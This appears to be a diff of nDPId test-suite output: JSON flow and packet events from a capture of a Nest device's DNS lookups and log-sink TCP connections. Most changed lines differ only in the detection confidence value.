+00800{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":613,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1536717427961,"flow_last_seen":1536717428084,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":136,"flow_avg_l4_payload_len":45,"midstream":0,"thread_ts_msec":1536717428084,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717428089,"flow_last_seen":1536717428089,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536717428089,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":614,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1536717428089,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536717428089,"pkt":"AJD7JidrGLQwJjRACABFAAAsMFEAAP8GGkzAqPIPI7yauvd0K1cJA0ANAAAAAGACEgCqTwAAAgQEgAAA"} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":615,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":2,"flow_last_seen":1536717428146,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536717428146,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93SD5IA7CQNADmASbvBIIgAAAgQFjA=="} 00466{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":616,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":3,"flow_last_seen":1536717428152,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536717428152,"pkt":"AJD7JidrGLQwJjRACABFAAAoMFIAAP8GGk\/AqPIPI7yauvd0K1cJA0AOg+SAPFAQEgC8pwAAAAAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717428089,"flow_last_seen":1536717430226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717430226,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
+00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":621,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717428089,"flow_last_seen":1536717430226,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717430226,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536717450091,"flow_last_seen":1536717450091,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536717450091,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":674,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1536717450091,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536717450091,"pkt":"AJD7JidrGLQwJjRACABFAAAsMG8AAP8GYgnAqPIPI65S7fd1K1cJDrE1AAAAAGACEgCA9gAAAgQEgAAA"} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":675,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":2,"flow_last_seen":1536717450156,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536717450156,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93XProMNCQ6xNmASaQPV8QAAAgQFtA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":676,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":3,"flow_last_seen":1536717450159,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536717450159,"pkt":"AJD7JidrGLQwJjRACABFAAAoMHAAAP8GYgzAqPIPI65S7fd1K1cJDrE2z66DDlAQEgBEsgAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717450091,"flow_last_seen":1536717452328,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717452328,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
-00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1536716407119,"flow_last_seen":1536717449999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3908,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} -00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536717428089,"flow_last_seen":1536717431514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":9343,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
-00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":711,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1536717427961,"flow_last_seen":1536717450088,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536717632764,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":681,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536717450091,"flow_last_seen":1536717452328,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536717452328,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00696{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":78,"flow_first_seen":1536716407119,"flow_last_seen":1536717449999,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":3908,"flow_avg_l4_payload_len":50,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63346,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00699{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":707,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1536717428089,"flow_last_seen":1536717431514,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":9343,"flow_avg_l4_payload_len":190,"midstream":0,"thread_ts_msec":1536717572672,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63348,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00687{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":711,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1536717427961,"flow_last_seen":1536717450088,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":127,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536717632764,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"}} 
00567{"daemon_event_id":4,"daemon_event_name":"status","thread_id":0,"packet_id":727,"source":"nest_log_sink.pcap","alias":"nDPId-test","packets-captured":727,"packets-processed":562,"total-skipped-flows":0,"total-l4-payload-len":56297,"total-not-detected-flows":0,"total-guessed-flows":1,"total-detected-flows":12,"total-detection-updates":3,"total-updates":0,"current-active-flows":1,"total-active-flows":12,"total-idle-flows":11,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":85,"global_ts_msec":1536717873194} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718052990,"flow_last_seen":1536718052990,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718052990,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":745,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1536718052990,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718052990,"pkt":"AJD7JidrGLQwJjRACABFAAAsMIsAAP8GYe3AqPIPI65S7fd2K1cJGivXAAAAAGACEgAGSAAAAgQEgAAA"} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":747,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1536718053059,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718053059,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAAC0GJHkjrlLtwKjyDytX93aQyd5SCRor2GASaQM+4wAAAgQFtA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":748,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1536718053062,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718053062,"pkt":"AJD7JidrGLQwJjRACABFAAAoMIwAAP8GYfDAqPIPI65S7fd2K1cJGivYkMneU1AQEgCtowAAAAAAAAAA"} -00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718052990,"flow_last_seen":1536718055162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718055162,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 
-00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1536717450091,"flow_last_seen":1536718053058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536718175916,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00659{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":753,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718052990,"flow_last_seen":1536718055162,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":677,"flow_tot_l4_payload_len":1260,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718055162,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63350,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00697{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"finished","flow_packets_processed":52,"flow_first_seen":1536717450091,"flow_last_seen":1536718053058,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":678,"flow_tot_l4_payload_len":3362,"flow_avg_l4_payload_len":64,"midstream":0,"thread_ts_msec":1536718175916,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63349,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": 
{"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00496{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1536718202959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1536718202959,"pkt":"AJD7JidrGLQwJjRACABFAABEMJoAAP8RJazAqPIPwKjyAc5xADUAMPGqwpsBAAABAAAAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAQ=="} -00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00784{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":779,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00516{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1536718202959,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":98,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":98,"pkt_l4_len":64,"thread_ts_msec":1536718202959,"pkt":"GLQwJjRAAJD7JidrCABFAABUb5VAAEARZaHAqPIBwKjyDwA1znEAQGW0wpuBgAABAAEAAAAADXdlYXZlLWxvZ3NpbmsEbmVzdANjb20AAAEAAcAMAAEAAQAAAHgABCO8mro="} -00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": 
{"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} +00799{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":780,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1536718202959,"flow_last_seen":1536718202959,"flow_idle_time":200000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":56,"flow_tot_l4_payload_len":96,"flow_avg_l4_payload_len":48,"midstream":0,"thread_ts_msec":1536718202959,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"192.168.242.1","src_port":52849,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"weave-logsink.nest.com","num_queries":1,"num_answers":1,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"35.188.154.186"}} 00589{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718202984,"flow_last_seen":1536718202984,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718202984,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":781,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1536718202984,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718202984,"pkt":"AJD7JidrGLQwJjRACABFAAAsMJsAAP8GGgLAqPIPI7yauvd3K1cJJajVAAAAAGACEgBBYgAAAgQEgAAA"} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":782,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1536718203039,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1536718203039,"pkt":"GLQwJjRAAJD7JidrCABFAAAsAABAADcG0p0jvJq6wKjyDytX93fElurmCSWo1mASbvAz1wAAAgQFjA=="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":783,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":3,"flow_last_seen":1536718203042,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1536718203042,"pkt":"AJD7JidrGLQwJjRACABFAAAoMJwAAP8GGgXAqPIPI7yauvd3K1cJJajWxJbq51AQEgCoXAAAAAAAAAAA"} -00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718202984,"flow_last_seen":1536718205132,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718205132,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} +00660{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":788,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1536718202984,"flow_last_seen":1536718205132,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":679,"flow_tot_l4_payload_len":1261,"flow_avg_l4_payload_len":157,"midstream":0,"thread_ts_msec":1536718205132,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.188.154.186","src_port":63351,"dst_port":11095,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"NestLogSink","breed":"Acceptable","category":"Cloud"}} 00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1536718206572,"flow_last_seen":1536718206572,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1536718206572,"l3_proto":"ip4","src_ip":"192.168.242.15","dst_ip":"35.174.82.237","src_port":63352,"dst_port":11095,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":834,"source":"nest_log_sink.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1536718206572,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1536718206572,"pkt":"AJD7JidrGLQwJjRACABFAAAsMLcAAP8GYcHAqPIPI65S7fd4K1cJMSXhAAAAAGACEgAMJQAAAgQEgAAA"} 
